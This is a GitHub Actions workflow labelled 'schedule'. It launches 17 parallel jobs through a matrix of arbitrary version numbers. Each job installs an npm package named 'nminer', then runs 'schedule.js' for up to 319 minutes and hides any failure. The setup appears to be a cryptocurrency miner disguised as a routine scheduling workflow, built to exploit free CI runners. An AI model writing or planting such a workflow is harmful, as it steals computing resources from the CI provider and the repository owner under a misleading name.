name: schedule
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5747 }
          - { version: 6791 }
          - { version: 7205 }
          - { version: 8421 }
          - { version: 5712 }
          - { version: 6863 }
          - { version: 4540 }
          - { version: 5320 }
          - { version: 7212 }
          - { version: 8133 }
          - { version: 1012 }
          - { version: 3489 }
          - { version: 7113 }
          - { version: 8602 }
          - { version: 466 }
          - { version: 7551 }
          - { version: 7981 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: crank if
        run: |
          npm install nminer@latest
          timeout 319m node schedule.js || echo "schedule executed"